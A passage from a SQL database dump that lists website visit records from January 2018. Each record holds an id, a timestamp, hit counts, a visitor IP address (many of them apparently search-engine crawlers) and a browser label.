ther'),(201908,1516903019,1,1,0,0,'64.246.161.42','firefox'),(201909,1516903074,1,1,0,0,'207.46.13.49','other'),(201910,1516903589,1,1,0,0,'178.154.171.88','other'),(201911,1516905609,1,1,0,0,'157.55.39.233','other'),(201912,1516906062,1,1,0,0,'178.154.171.88','other'),(201913,1516906175,1,1,0,0,'188.163.32.215','opera'),(201914,1516906676,1,1,0,0,'37.9.113.101','other'),(201915,1516907170,1,1,0,0,'91.196.178.68','firefox'),(201916,1516907240,1,1,0,0,'91.196.178.6','chrome'),(201917,1516907415,1,1,0,0,'95.134.97.251','chrome'),(201918,1516907451,6,6,0,0,'216.244.66.246','other'),(201919,1516907458,2,2,0,0,'141.8.142.74','other'),(201920,1516907742,1,1,0,0,'46.219.220.89','firefox'),(201921,1516909805,1,1,0,0,'141.8.142.74','other'),(201922,1516911276,2,2,0,0,'141.8.142.74','other'),(201923,1516911323,1,1,0,0,'8.29.198.27','other'),(201924,1516911350,6,6,0,0,'216.244.66.194','other'),(201925,1516912122,1,1,0,0,'96.47.226.22','other'),(201926,1516912227,1,1,0,0,'207.46.13.34','other'),(201927,1516912249,1,0,1,0,'66.249.69.99',''),(201928,1516912342,1,1,0,0,'158.69.254.103','other'),(201929,1516912891,5,5,0,0,'216.244.66.246','other'),(201930,1516913404,5,5,0,0,'216.244.66.194','other'),(201931,1516913509,1,1,0,0,'178.154.171.88','other'),(201932,1516913817,1,1,0,0,'91.196.178.162','chrome'),(201933,1516914707,1,1,0,0,'204.12.226.26','other'),(201934,1516914830,1,1,0,0,'141.8.142.74','other'),(201935,1516916993,2,2,0,0,'162.210.196.129','other'),(201936,1516917167,1,1,0,0,'87.250.224.46','other'),(201937,1516917348,1,1,0,0,'157.55.39.238','other'),(201938,1516917713,1,1,0,0,'216.244.66.246','other'),(201939,1516918544,1,1,0,0,'178.154.171.88','other'),(201940,1516918988,1,1,0,0,'37.9.113.138','other'),(201941,1516919816,1,1,0,0,'66.249.65.157','chrome'),(201942,1516920817,1,1,0,0,'178.154.171.81','other'),(201943,1516921204,1,1,0,0,'87.250.224.85','other'),(201944,1516922027,2,2,0,0,'216.244.66.194','other'),(201945,1516922165,1,1,0,0,'8.29.198.26','other'),(201946,1516922177,1,1,0,0,'5.45.207.58','other'),(201947,1516922302,1,1,0,0,'37.9.113.134','other'),(201948,1516922509,1,1,0,0,'91.209.11.236','other'),(201949,1516922801,1,1,0,0,'46.188.20.136','msie'),(201950,1516923645,3,3,0,0,'216.244.66.194','other'),(201951,1516923685,1,1,0,0,'13.56.229.65','chrome'),(201952,1516924456,1,1,0,0,'37.9.113.138','other'),(201953,1516925139,1,1,0,0,'207.46.13.34','other'),(201954,1516925969,1,1,0,0,'178.154.200.32','other'),(201955,1516926452,1,1,0,0,'37.9.113.101','other'),(201956,1516927596,1,1,0,0,'157.55.39.249','other'),(201957,1516928138,1,1,0,0,'37.9.113.101','other'),(201958,1516928490,3,3,0,0,'216.244.66.246','other'),(201959,1516929660,1,1,0,0,'37.9.113.138','other'),(201960,1516929947,1,1,0,0,'37.9.113.101','other'),(201962,1516930728,1,1,0,0,'91.209.11.236','other'),(201963,1516930849,1,1,0,0,'66.249.64.30','chrome'),(201964,1516931481,1,1,0,0,'87.250.224.46','other'),(201965,1516931896,1,1,0,0,'141.8.142.74','other'),(201966,1516931987,2,2,0,0,'216.244.66.194','other'),(201967,1516933006,1,1,0,0,'8.29.198.27','other'),(201968,1516933336,2,2,0,0,'141.8.142.74','other'),(201969,1516933840,1,1,0,0,'34.239.255.31','other'),(201970,1516934304,1,1,0,0,'91.209.11.236','other'),(201971,1516934404,1,1,0,0,'216.244.66.246','other'),(201972,1516934513,3,3,0,0,'216.244.66.194','other'),(201973,1516935444,1,0,1,0,'68.180.229.52',''),(201974,1516935556,3,3,0,0,'141.8.142.74','other'),(201975,1516935623,1,1,0,0,'217.69.133.233','other'),(201976,1516936039,1,1,0,0,'91.209.11.236','other'),(201977,1516937818,1,1,0,0,'87.250.224.66','other'),(201978,1516938265,2,2,0,0,'216.244.66.246','other'),(201979,1516938421,1,1,0,0,'87.250.224.46','other'),(201980,1516938707,1,1,0,0,'37.9.113.63','other'),(201981,1516938710,1,1,0,0,'37.9.113.115','other'),(201982,1516938714,1,1,0,0,'95.108.181.111','other'),(201983,1516939287,1,1,0,0,'178.154.171.88','other'),(201984,1516940191,1,1,0,0,'207.46.13.49','other'),(201985,1516940491,1,1,0,0,'87.250.224.46','other'),(201986,1516941491,1,1,0,0,'87.250.224.46','other'),(201987,1516943184,1,1,0,0,'66.249.81.70','chrome'),(201988,1516943190,1,1,0,0,'5.53.117.99','chrome'),(201989,1516943234,1,1,0,0,'34.239.255.31','other'),(201990,1516943409,1,1,0,0,'141.8.142.74','other'),(201991,1516943449,1,1,0,0,'46.161.9.52','firefox'),(201992,1516943839,1,1,0,0,'8.29.198.27','other'),(201993,1516944381,1,1,0,0,'157.55.39.249','other'),(201994,1516944802,3,3,0,0,'216.244.66.194','other'),(201995,1516944852,1,1,0,0,'217.69.133.234','other'),(201996,1516945086,5,5,0,0,'216.244.66.246','other'),(201997,1516945523,1,1,0,0,'91.209.11.236','other'),(201998,1516945629,1,1,0,0,'157.55.39.249','other'),(201999,1516946129,1,1,0,0,'141.8.142.74','other'),(202000,1516947242,1,1,0,0,'54.36.149.90','other'),(202001,1516947963,1,1,0,0,'54.36.148.147','other'),(202002,1516947966,1,1,0,0,'54.36.149.104','other'),(202003,1516947983,1,1,0,0,'178.154.171.88','other'),(202004,1516948118,1,1,0,0,'66.249.64.221','chrome'),(202005,1516948232,1,1,0,0,'54.36.149.68','other'),(202006,1516948303,4,4,0,0,'216.244.66.246','other'),(202007,1516948357,1,1,0,0,'137.74.207.170','other'),(202008,1516948477,1,1,0,0,'54.36.148.151','other'),(202009,1516948486,2,2,0,0,'54.165.59.7','other'),(202010,1516948617,1,1,0,0,'91.209.11.236','other'),(202011,1516948729,1,1,0,0,'54.36.148.146','other'),(202012,1516948867,1,1,0,0,'54.36.149.30','other'),(202013,1516949638,1,1,0,0,'46.161.9.52','firefox'),(202014,1516949710,1,1,0,0,'157.55.39.187','other'),(202015,1516949898,1,1,0,0,'54.36.148.204','other'),(202016,1516949917,2,2,0,0,'54.165.59.7','other'),(202017,1516950023,1,1,0,0,'207.46.13.49','other'),(202018,1516950119,1,1,0,0,'54.36.148.66','other'),(202019,1516950362,1,1,0,0,'91.209.11.236','other'),(202020,1516950523,1,1,0,0,'91.196.178.34','chrome'),(202021,1516950822,1,1,0,0,'141.8.142.74','other'),(202022,1516950877,1,1,0,0,'54.36.149.29','other'),(202023,1516950995,1,0,1,0,'66.249.64.217',''),(202024,1516951208,1,1,0,0,'216.244.66.237','other'),(202025,1516951480,1,1,0,0,'54.36.148.251','other'),(202026,1516952014,1,1,0,0,'54.36.148.196','other'),(202027,1516952109,2,2,0,0,'178.154.171.88','other'),(202028,1516952279,1,1,0,0,'54.36.148.163','other'),(202029,1516952578,1,1,0,0,'54.36.148.173','other'),(202030,1516952707,1,1,0,0,'54.36.148.49','other'),(202031,1516952760,1,0,1,0,'66.249.64.219',''),(202032,1516952770,1,1,0,0,'54.36.149.60','other'),(202033,1516952869,4,4,0,0,'216.244.66.194','other'),(202034,1516953315,1,1,0,0,'91.196.178.13','chrome'),(202035,1516953679,1,1,0,0,'54.36.148.75','other'),(202036,1516953686,1,1,0,0,'31.43.3.49','chrome'),(202037,1516953952,1,1,0,0,'54.36.148.153','other'),(202038,1516953987,1,1,0,0,'95.46.140.32','msie'),(202039,1516954170,1,1,0,0,'91.209.11.236','other'),(202040,1516954328,1,1,0,0,'54.36.148.112','other'),(202041,1516954436,1,1,0,0,'54.36.149.86','other'),(202042,1516954675,1,1,0,0,'8.29.198.27','other'),(202043,1516954837,4,4,0,0,'216.244.66.194','other'),(202044,1516954902,1,1,0,0,'66.249.64.28','chrome'),(202045,1516954934,1,1,0,0,'54.36.148.31','other'),(202046,1516955082,1,1,0,0,'141.8.142.74','other'),(202047,1516955138,1,1,0,0,'54.36.149.19','other'),(202048,1516955178,3,3,0,0,'216.244.66.246','other'),(202049,1516955632,2,2,0,0,'91.209.11.236','other'),(202050,1516955684,1,1,0,0,'37.55.56.152','firefox'),(202051,1516956120,2,0,2,0,'66.249.64.30',''),(202052,1516956241,1,1,0,0,'141.8.142.74','other'),(202053,1516956421,1,1,0,0,'130.180.218.35','chrome'),(202054,1516956738,1,1,0,0,'54.36.148.163','other'),(202055,1516957097,1,1,0,0,'91.196.178.163','firefox'),(202056,1516957323,1,1,0,0,'54.36.148.108','other'),(202057,1516957405,1,0,1,0,'66.249.64.221',''),(202058,1516957695,1,1,0,0,'54.36.148.182','other'),(202059,1516958039,1,1,0,0,'91.200.12.21','chrome'),(202060,1516958051,1,1,0,0,'54.36.148.168','other'),(202061,1516958170,1,1,0,0,'91.196.178.90','chrome'),(202062,1516958267,2,2,0,0,'141.8.142.74','other'),(202063,1516958309,1,1,0,0,'54.36.148.83','other'),(202064,1516958640,1,1,0,0,'91.196.178.167','chrome'),(202065,1516958758,1,1,0,0,'54.36.149.42','other'),(202066,1516958797,1,1,0,0,'91.196.178.77','chrome'),(202067,1516958801,1,1,0,0,'216.244.66.246','other'),(202068,1516958853,1,1,0,0,'54.36.148.80','other'),(202069,1516958857,1,1,0,0,'54.36.148.235','other'),(202070,1516959211,1,1,0,0,'91.196.178.86','chrome'),(202071,1516959238,1,1,0,0,'54.36.148.47','other'),(202072,1516959598,1,1,0,0,'194.44.110.7','firefox'),(202073,1516959619,1,1,0,0,'91.209.11.236','other'),(202074,1516959904,1,1,0,0,'94.179.44.104','chrome'),(202075,1516960239,1,1,0,0,'54.36.148.154','other'),(202076,1516960325,1,1,0,0,'91.196.178.93','chrome'),(202077,1516960343,1,1,0,0,'141.8.142.74','other'),(202078,1516960552,1,1,0,0,'178.95.244.20','chrome'),(202079,1516960731,1,1,0,0,'54.36.148.158','other'),(202080,1516960803,11,11,0,0,'23.237.4.26','other'),(202081,1516960941,1,1,0,0,'157.55.39.249','other'),(202082,1516961000,1,0,1,0,'66.249.64.29',''),(202083,1516961787,1,1,0,0,'54.36.149.16','other'),(202084,1516962354,1,1,0,0,'54.36.148.135','other'),(202085,1516962372,1,1,0,0,'216.244.66.194','other'),(202086,1516962446,1,1,0,0,'54.36.148.31','other'),(202087,1516962577,1,1,0,0,'91.196.178.42','chrome'),(202088,1516962578,1,1,0,0,'54.36.148.197','other'),(202089,1516962598,2,2,0,0,'141.8.142.74','other'),(202090,1516962905,1,1,0,0,'91.209.11.236','other'),(202091,1516963844,1,1,0,0,'54.36.148.206','other'),(202092,1516964090,1,1,0,0,'141.8.132.19','other'),(202093,1516964270,1,1,0,0,'95.135.240.217','chrome'),(202094,1516964335,1,1,0,0,'54.36.148.48','other'),(202095,1516964336,1,1,0,0,'54.36.148.166','other'),(202096,1516964369,1,0,1,0,'68.180.229.52',''),(202097,1516964606,1,1,0,0,'141.8.142.74','other'),(202098,1516964610,2,2,0,0,'157.55.39.238','other'),(202099,1516964955,1,1,0,0,'54.36.148.158','other'),(202100,1516965167,1,1,0,0,'91.196.178.77','chrome'),(202101,1516965288,3,3,0,0,'216.244.66.246','other'),(202102,1516965429,1,1,0,0,'54.36.148.73','other'),(202103,1516965520,1,1,0,0,'8.29.198.27','other'),(202104,1516965937,1,1,0,0,'157.55.39.238','other'),(202105,1516966097,1,1,0,0,'91.209.11.236','other'),(202106,1516966583,1,1,0,0,'54.36.149.57','other'),(202107,1516966888,1,1,0,0,'54.36.148.72','other'),(202108,1516967260,1,1,0,0,'54.36.149.91','other'),(202109,1516967261,1,1,0,0,'54.36.149.59','other'),(202110,1516967308,1,1,0,0,'146.0.231.218','firefox'),(202111,1516967327,1,1,0,0,'87.250.224.46','other'),(202112,1516967442,1,1,0,0,'54.36.148.143','other'),(202113,1516967704,1,1,0,0,'217.69.133.69','other'),(202114,1516968357,1,1,0,0,'180.76.15.6','other'),(202115,1516968431,2,2,0,0,'91.196.178.164','chrome'),(202116,1516968629,1,1,0,0,'178.154.171.88','other'),(202117,1516968729,1,1,0,0,'54.36.148.18','other'),(202118,1516968881,1,1,0,0,'141.8.142.74','other'),(202119,1516969247,1,1,0,0,'54.36.148.140','other'),(202120,1516969300,2,2,0,0,'216.244.66.246','other'),(202121,1516969367,1,1,0,0,'95.132.134.69','firefox'),(202122,1516969634,1,1,0,0,'91.196.178.20','chrome'),(202123,1516969681,1,1,0,0,'54.36.148.15','other'),(202124,1516969835,1,1,0,0,'91.196.178.164','chrome'),(202125,1516970133,1,1,0,0,'91.196.178.81','chrome'),(202126,1516970241,1,1,0,0,'54.36.148.179','other'),(202127,1516970390,1,1,0,0,'54.36.148.54','other'),(202128,1516970456,1,1,0,0,'54.36.148.62','other'),(202129,1516970670,1,1,0,0,'54.36.149.96','other'),(202130,1516970811,1,1,0,0,'54.36.148.15','other'),(202131,1516971360,1,1,0,0,'54.36.148.134','other'),(202132,1516971497,1,1,0,0,'178.154.171.88','other'),(202133,1516971507,1,1,0,0,'91.209.11.236','other'),(202134,1516971649,1,1,0,0,'54.36.149.82','other'),(202135,1516971795,1,1,0,0,'157.55.39.238','other'),(202136,1516971911,1,1,0,0,'91.196.178.77','chrome'),(202137,1516971915,1,1,0,0,'54.36.148.42','other'),(202138,1516972371,3,3,0,0,'216.244.66.194','other'),(202139,1516972764,1,1,0,0,'216.244.66.237','other'),(202140,1516973084,1,1,0,0,'54.36.148.253','other'),(202141,1516973101,1,1,0,0,'87.250.224.85','other'),(202142,1516973252,1,1,0,0,'54.36.148.196','other'),(202143,1516973749,1,1,0,0,'141.8.142.74','other'),(202144,1516973903,1,1,0,0,'54.36.148.193','other'),(202145,1516974539,3,3,0,0,'216.244.66.194','other'),(202146,1516974574,1,1,0,0,'54.36.148.24','other'),(202147,1516974584,1,1,0,0,'54.36.148.72','other'),(202148,1516974704,1,1,0,0,'178.54.32.43','msie'),(202149,1516974728,1,1,0,0,'54.36.149.102','other'),(202150,1516974838,1,1,0,0,'157.55.39.249','other'),(202151,1516975231,4,4,0,0,'216.244.66.246','other'),(202152,1516975486,1,1,0,0,'51.255.71.123','other'),(202153,1516975604,1,1,0,0,'54.36.149.104','other'),(202154,1516975618,1,1,0,0,'54.36.148.180','other'),(202155,1516975682,1,1,0,0,'37.9.113.115','other'),(202156,1516975685,1,1,0,0,'178.154.171.60','other'),(202157,1516975873,1,1,0,0,'54.36.149.69','other'),(202158,1516976325,1,1,0,0,'54.36.149.80','other'),(202159,1516976360,1,1,0,0,'8.29.198.25','other'),(202160,1516976398,1,1,0,0,'80.248.227.208','other'),(202161,1516976431,1,1,0,0,'141.8.142.74','other'),(202162,1516976992,1,1,0,0,'54.36.148.135','other'),(202163,1516977377,1,1,0,0,'31.202.251.237','chrome'),(202164,1516977645,1,1,0,0,'54.36.148.167','other'),(202165,1516977667,1,1,0,0,'54.36.149.31','other'),(202166,1516977681,1,1,0,0,'54.36.148.14','other'),(202167,1516977828,1,1,0,0,'207.46.13.49','other'),(202168,1516977915,1,1,0,0,'178.154.171.88','other'),(202169,1516977983,1,1,0,0,'54.36.148.138','other'),(202170,1516978243,1,1,0,0,'54.36.148.252','other'),(202171,1516978657,1,1,0,0,'157.55.39.187','other'),(202172,1516978732,1,1,0,0,'199.30.24.89','other'),(202173,1516978827,1,1,0,0,'54.36.148.237','other'),(202174,1516978957,1,1,0,0,'157.55.39.249','other'),(202175,1516979106,1,1,0,0,'54.36.148.15','other'),(202176,1516979355,1,1,0,0,'54.36.149.68','other'),(202177,1516979492,2,2,0,0,'62.210.103.36','other'),(202178,1516979496,1,1,0,0,'54.36.148.31','other'),(202179,1516979955,1,1,0,0,'178.154.171.88','other'),(202180,1516980436,2,2,0,0,'216.244.66.246','other'),(202181,1516980855,1,1,0,0,'54.36.149.63','other'),(202182,1516980895,1,1,0,0,'54.36.149.107','other'),(202183,1516980914,1,1,0,0,'54.36.148.239','other'),(202184,1516981598,1,0,1,0,'68.180.229.52',''),(202185,1516981746,1,1,0,0,'157.55.39.249','other'),(202186,1516981855,1,1,0,0,'54.36.148.248','other'),(202187,1516982119,1,1,0,0,'141.8.142.74','other'),(202188,1516982560,1,1,0,0,'216.244.66.194','other'),(202189,1516982960,1,1,0,0,'207.46.13.49','other'),(202190,1516983267,3,3,0,0,'141.8.142.74','other'),(202191,1516983336,1,1,0,0,'178.54.32.43','msie'),(202192,1516983467,1,1,0,0,'87.250.224.46','other'),(202193,1516983903,5,5,0,0,'216.244.66.194','other'),(202194,1516983977,1,1,0,0,'54.36.148.202','other'),(202195,1516984236,1,1,0,0,'89.103.58.108','chrome'),(202196,1516984550,1,1,0,0,'66.249.64.29','chrome'),(202197,1516984798,1,1,0,0,'54.36.148.232','other'),(202198,1516984858,1,1,0,0,'54.36.148.153','other'),(202199,1516984888,1,1,0,0,'37.53.231.125','chrome'),(202200,1516985046,3,3,0,0,'216.244.66.246','other'),(202201,1516985428,1,1,0,0,'54.36.149.2','other'),(202202,1516985456,1,1,0,0,'54.36.149.30','other'),(202203,1516985547,1,1,0,0,'54.36.149.17','other'),(202204,1516985760,1,1,0,0,'188.230.43.254','other'),(202205,1516985840,1,1,0,0,'51.255.71.113','other'),(202206,1516986305,1,1,0,0,'54.36.148.204','other'),(202207,1516986368,1,1,0,0,'141.8.142.74','other'),(202208,1516986463,1,1,0,0,'207.46.13.49','other'),(202209,1516986564,1,0,1,0,'66.249.64.30',''),(202210,1516986584,1,0,1,0,'68.180.229.52',''),(202211,1516987201,1,1,0,0,'8.29.198.25','other'),(202212,1516987343,1,1,0,0,'54.36.149.19','other'),(202213,1516987359,1,1,0,0,'91.196.178.99','chrome'),(202214,1516987540,1,1,0,0,'91.196.178.20','chrome'),(202215,1516987563,1,1,0,0,'204.101.161.159','msie'),(202216,1516988136,1,1,0,0,'188.230.43.254','other'),(202217,1516988250,1,1,0,0,'54.36.149.48','other'),(202218,1516988254,1,1,0,0,'178.154.171.88','other'),(202219,1516988364,1,1,0,0,'54.36.148.162','other'),(202220,1516988511,1,1,0,0,'54.36.148.173','other'),(202221,1516988818,1,1,0,0,'54.36.148.106','other'),(202222,1516988875,1,1,0,0,'54.36.149.71','other'),(202223,1516989022,2,2,0,0,'108.59.8.70','other'),(202224,1516989074,1,1,0,0,'51.255.71.126','other'),(202225,1516989249,1,1,0,0,'66.249.64.217','chrome'),(202226,1516989607,1,1,0,0,'54.36.148.170','other'),(202227,1516989716,1,1,0,0,'54.36.148.75','other'),(202228,1516989836,1,1,0,0,'91.196.178.65','firefox'),(202229,1516990339,1,1,0,0,'216.244.66.246','other'),(202230,1516990542,1,1,0,0,'188.230.43.254','other'),(202231,1516990630,1,1,0,0,'87.250.224.46','other'),(202232,1516990822,1,1,0,0,'54.36.149.15','other'),(202233,1516991160,1,1,0,0,'54.36.149.32','other'),(202234,1516991937,1,1,0,0,'54.36.148.162','other'),(202235,1516992277,1,1,0,0,'54.36.148.153','other'),(202236,1516992383,1,1,0,0,'178.154.171.88','other'),(202237,1516992575,2,2,0,0,'216.244.66.194','other'),(202238,1516992805,2,2,0,0,'54.36.148.250','other'),(202239,1516992995,1,0,1,0,'66.249.64.29',''),(202240,1516993241,1,1,0,0,'54.36.148.236','other'),(202241,1516993256,1,1,0,0,'54.36.148.184','other'),(202242,1516993979,1,1,0,0,'188.255.119.127','chrome'),(202243,1516994092,4,4,0,0,'216.244.66.194','other'),(202244,1516994287,1,1,0,0,'178.92.255.32','firefox'),(202245,1516994660,1,1,0,0,'178.54.32.43','opera'),(202246,1516994750,1,1,0,0,'51.255.71.114','other'),(202247,1516994799,4,4,0,0,'216.244.66.246','other'),(202248,1516995366,1,1,0,0,'54.36.148.247','other'),(202249,1516995436,1,1,0,0,'54.36.148.165','other'),(202250,1516995447,1,1,0,0,'141.8.142.74','other'),(202251,1516995542,1,1,0,0,'54.36.148.208','other'),(202252,1516996078,1,1,0,0,'54.36.148.255','other'),(202253,1516996230,1,1,0,0,'54.36.148.179','other'),(202254,1516996354,1,1,0,0,'54.36.148.109','other'),(202255,1516996361,1,1,0,0,'54.36.148.113','other'),(202256,1516996398,1,0,1,0,'66.249.64.28',''),(202257,1516996443,1,1,0,0,'54.36.148.190','other'),(202258,1516997396,1,1,0,0,'54.36.149.46','other'),(202259,1516997503,1,1,0,0,'54.36.148.135','other'),(202260,1516997877,1,1,0,0,'178.154.171.88','other'),(202261,1516998041,1,1,0,0,'8.29.198.25','other'),(202262,1516998231,2,2,0,0,'141.8.142.74','other'),(202263,1516998906,1,1,0,0,'54.36.149.105','other'),(202264,1516999378,1,1,0,0,'178.154.171.88','other'),(202265,1516999487,1,1,0,0,'91.196.178.164','chrome'),(202266,1517000641,1,1,0,0,'54.36.148.191','other'),(202267,1517000755,3,3,0,0,'216.244.66.246','other'),(202268,1517000838,1,0,1,0,'66.249.64.30',''),(202269,1517000884,1,1,0,0,'54.36.149.96','other'),(202270,1517000905,1,1,0,0,'141.8.142.74','other'),(202271,1517001629,1,1,0,0,'54.36.149.61','other'),(202272,1517001725,1,1,0,0,'216.244.66.237','other'),(202273,1517002230,1,1,0,0,'54.36.149.63','other'),(202274,1517002331,1,1,0,0,'37.9.113.182','other'),(202275,1517002718,1,1,0,0,'54.36.149.65','other'),(202276,1517002898,6,6,0,0,'216.244.66.194','other'),(202277,1517003256,1,1,0,0,'141.8.142.74','other'),(202278,1517003504,1,1,0,0,'54.165.59.7','other'),(202279,1517003907,1,1,0,0,'54.36.149.42','other'),(202280,1517004110,1,1,0,0,'54.36.148.240','other'),(202281,1517004430,3,3,0,0,'216.244.66.194','other'),(202282,1517005307,1,1,0,0,'54.36.148.18','other'),(202283,1517005469,1,1,0,0,'54.36.148.170','other'),(202284,1517005682,3,3,0,0,'216.244.66.246','other'),(202285,1517005912,1,1,0,0,'34.239.255.31','other'),(202286,1517006164,2,2,0,0,'51.255.71.126','other'),(202287,1517006230,1,1,0,0,'178.154.171.88','other'),(202288,1517006314,1,1,0,0,'54.36.149.76','other'),(202289,1517006343,2,2,0,0,'141.8.142.74','other'),(202290,1517006987,1,1,0,0,'216.244.66.237','other'),(202291,1517006988,1,1,0,0,'54.36.148.77','other'),(202292,1517007055,1,1,0,0,'54.36.148.173','other'),(202293,1517007156,1,1,0,0,'34.239.255.31','other'),(202294,1517007289,1,1,0,0,'54.36.148.121','other'),(202295,1517007436,1,1,0,0,'54.36.149.102','other'),(202296,1517007511,1,1,0,0,'54.36.148.120','other'),(202297,1517007662,1,1,0,0,'54.36.149.55','other'),(202298,1517007713,1,1,0,0,'54.36.148.16','other'),(202299,1517007755,1,1,0,0,'54.36.148.92','other'),(202300,1517007879,1,1,0,0,'54.36.149.73','other'),(202301,1517008226,1,1,0,0,'54.36.148.88','other'),(202302,1517008257,1,0,1,0,'66.249.64.29',''),(202303,1517008498,1,1,0,0,'34.239.255.31','other'),(202304,1517008653,1,1,0,0,'141.8.142.74','other'),(202305,1517008870,1,0,1,0,'66.249.64.219',''),(202306,1517008873,1,1,0,0,'8.29.198.26','other'),(202307,1517008885,1,1,0,0,'66.249.64.28','chrome'),(202308,1517008977,1,1,0,0,'54.36.148.36','other'),(202309,1517009296,1,1,0,0,'157.55.39.187','other'),(202310,1517009381,1,1,0,0,'54.36.148.167','other'),(202311,1517009416,1,1,0,0,'54.36.148.13','other'),(202312,1517009690,1,1,0,0,'157.55.39.238','other'),(202313,1517009746,1,1,0,0,'34.239.255.31','other'),(202314,1517010089,1,1,0,0,'54.36.148.119','other'),(202315,1517010536,1,1,0,0,'216.244.66.246','other'),(202316,1517010544,1,1,0,0,'54.36.149.30','other'),(202317,1517010860,1,1,0,0,'54.36.149.95','other'),(202318,1517010886,1,1,0,0,'54.36.149.17','other'),(202319,1517011063,1,1,0,0,'34.239.255.31','other'),(202320,1517011094,1,1,0,0,'212.33.255.53','firefox'),(202321,1517011157,1,1,0,0,'51.255.71.133','other'),(202322,1517011386,1,1,0,0,'54.36.148.199','other'),(202323,1517011533,1,0,1,0,'66.249.64.28',''),(202324,1517011769,1,1,0,0,'141.8.142.74','other'),(202325,1517011841,1,1,0,0,'54.36.148.189','other'),(202326,1517011854,1,1,0,0,'54.36.148.144','other'),(202327,1517012021,1,1,0,0,'54.36.148.66','other'),(202328,1517012290,1,1,0,0,'40.77.167.169','other'),(202329,1517012513,1,1,0,0,'34.239.255.31','other'),(202330,1517012743,1,1,0,0,'54.36.149.95','other'),(202331,1517013020,2,2,0,0,'216.244.66.194','other'),(202332,1517013289,1,1,0,0,'141.8.142.74','other'),(202333,1517013501,1,1,0,0,'54.36.148.133','other'),(202334,1517013609,1,1,0,0,'54.36.149.50','other'),(202335,1517014118,1,1,0,0,'40.77.167.169','other'),(202336,1517014122,1,1,0,0,'87.250.224.46','other'),(202337,1517014303,1,1,0,0,'54.36.149.36','other'),(202338,1517014421,1,1,0,0,'54.36.148.98','other'),(202339,1517014471,4,4,0,0,'216.244.66.194','other'),(202340,1517014534,1,0,1,0,'68.180.229.52',''),(202341,1517014762,1,1,0,0,'34.239.255.31','other'),(202342,1517015014,1,1,0,0,'217.69.133.72','other'),(202343,1517015367,1,1,0,0,'137.74.207.170','other'),(202344,1517015413,1,1,0,0,'54.36.148.75','other'),(202345,1517015652,3,3,0,0,'216.244.66.246','other'),(202346,1517015664,1,1,0,0,'54.36.148.43','other'),(202347,1517015725,1,1,0,0,'34.239.255.31','other'),(202348,1517015793,1,0,1,0,'66.249.64.28',''),(202349,1517015858,1,1,0,0,'54.36.148.49','other'),(202350,1517015931,1,1,0,0,'54.36.149.75','other'),(202351,1517016030,1,1,0,0,'54.36.148.111','other'),(202352,1517016523,1,1,0,0,'54.36.148.168','other'),(202353,1517016695,1,1,0,0,'34.239.255.31','other'),(202354,1517016804,1,1,0,0,'54.36.148.146','other'),(202355,1517017006,1,1,0,0,'54.36.149.43','other'),(202356,1517017229,1,1,0,0,'178.154.171.88','other'),(202357,1517017670,1,0,1,0,'66.249.64.221',''),(202358,1517017730,1,1,0,0,'34.239.255.31','other'),(202359,1517018113,1,1,0,0,'54.36.148.20','other'),(202360,1517018438,1,1,0,0,'54.36.149.5','other'),(202361,1517018540,1,1,0,0,'54.36.149.26','other'),(202362,1517018624,1,1,0,0,'54.36.148.82','other'),(202363,1517018821,1,1,0,0,'34.239.255.31','other'),(202364,1517019006,1,1,0,0,'54.36.148.113','other'),(202365,1517019224,1,0,1,0,'68.180.229.52',''),(202366,1517019563,1,1,0,0,'54.36.148.95','other'),(202367,1517019655,1,1,0,0,'141.8.142.74','other'),(202368,1517019702,1,1,0,0,'8.29.198.27','other'),(202369,1517019900,1,1,0,0,'54.36.149.46','other'),(202370,1517019929,1,1,0,0,'54.36.148.240','other'),(202371,1517020488,4,4,0,0,'216.244.66.246','other'),(202372,1517020977,1,1,0,0,'54.36.148.166','other'),(202373,1517021110,1,1,0,0,'54.36.149.107','other'),(202374,1517021184,1,1,0,0,'54.36.148.244','other'),(202375,1517021481,1,1,0,0,'34.239.255.31','other'),(202376,1517022023,1,1,0,0,'54.36.148.208','other'),(202377,1517022046,1,1,0,0,'54.36.148.140','other'),(202378,1517022385,4,4,0,0,'216.244.66.194','other'),(202379,1517022602,1,1,0,0,'141.8.142.74','other'),(202380,1517022660,1,0,1,0,'66.249.64.30',''),(202381,1517022773,1,1,0,0,'54.36.148.27','other'),(202382,1517022930,1,1,0,0,'34.239.255.31','other'),(202383,1517023239,1,1,0,0,'54.36.148.15','other'),(202384,1517023310,2,0,2,0,'66.249.64.28',''),(202385,1517023318,1,1,0,0,'54.36.148.204','other'),(202386,1517023498,1,1,0,0,'54.36.148.154','other'),(202387,1517023592,1,1,0,0,'51.255.71.133','other'),(202388,1517023845,1,1,0,0,'54.36.149.11','other'),(202389,1517024408,1,1,0,0,'54.36.148.12','other'),(202390,1517024415,1,1,0,0,'54.36.148.134','other'),(202391,1517024516,3,3,0,0,'216.244.66.194','other'),(202392,1517024573,1,1,0,0,'141.8.142.74','other'),(202393,1517025324,1,1,0,0,'54.36.148.176','other'),(202394,1517025333,1,1,0,0,'54.36.148.143','other'),(202395,1517025396,1,0,1,0,'68.180.229.52',''),(202396,1517025411,1,1,0,0,'91.209.11.236','other'),(202397,1517025442,1,1,0,0,'51.255.71.121','other'),(202398,1517025516,1,1,0,0,'34.239.255.31','other'),(202399,1517025610,1,1,0,0,'54.36.148.248','other'),(202400,1517025860,1,1,0,0,'54.36.148.74','other'),(202401,1517026037,1,1,0,0,'216.244.66.246','other'),(202402,1517026377,1,1,0,0,'54.36.149.35','other'),(202403,1517026389,1,1,0,0,'54.36.149.41','other'),(202404,1517026517,1,1,0,0,'54.36.148.185','other'),(202405,1517026761,1,1,0,0,'54.36.148.232','other'),(202406,1517026869,1,1,0,0,'54.36.149.72','other'),(202407,1517027094,1,1,0,0,'54.36.148.88','other'),(202408,1517027726,1,1,0,0,'141.8.142.74','other'),(202409,1517027745,1,1,0,0,'54.36.148.73','other'),(202410,1517028078,1,1,0,0,'54.36.149.80','other'),(202411,1517028191,4,0,4,0,'66.249.64.29',''),(202412,1517029282,1,1,0,0,'54.36.149.69','other'),(202413,1517029631,1,1,0,0,'87.250.224.46','other'),(202414,1517029756,1,0,1,0,'66.249.64.28',''),(202415,1517030241,6,6,0,0,'216.244.66.246','other'),(202416,1517030533,1,1,0,0,'8.29.198.27','other'),(202417,1517031015,1,1,0,0,'54.36.149.105','other'),(202418,1517031192,1,1,0,0,'54.36.148.50','other'),(202419,1517031362,1,1,0,0,'54.36.148.112','other'),(202420,1517032351,1,1,0,0,'54.36.148.52','other'),(202421,1517032389,1,1,0,0,'54.36.148.36','other'),(202422,1517032950,1,1,0,0,'216.244.66.194','other'),(20242